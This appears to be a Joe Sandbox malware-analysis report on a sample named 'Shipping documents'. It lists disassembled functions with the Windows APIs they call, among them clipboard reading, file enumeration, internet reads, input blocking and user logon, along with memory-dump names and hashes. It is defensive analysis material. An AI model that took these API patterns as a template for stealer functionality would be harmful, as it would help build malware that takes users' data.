                                                                                                          Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15083398-0
                                                                                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                          Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: U$\
                                                                                                          • API String ID: 4104443479-100911408
                                                                                                          • Opcode ID: 55a527c89cce6aac9f503012c1253d9ae05f00ef26dfca22b5e57f48bb3c404e
                                                                                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                          • Opcode Fuzzy Hash: 55a527c89cce6aac9f503012c1253d9ae05f00ef26dfca22b5e57f48bb3c404e
                                                                                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                          Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 3541575487-0
                                                                                                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                          Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 48322524-0
                                                                                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                          Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 901099227-0
                                                                                                          • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                          • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                          Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Proc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2346855178-0
                                                                                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                          Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlockInput
                                                                                                          • String ID:
                                                                                                          • API String ID: 3456056419-0
                                                                                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                          Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LogonUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1244722697-0
                                                                                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                          Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2645101109-0
                                                                                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                          Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                          Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: N@
                                                                                                          • API String ID: 0-1509896676
                                                                                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                          Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                          Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                          Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                          Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
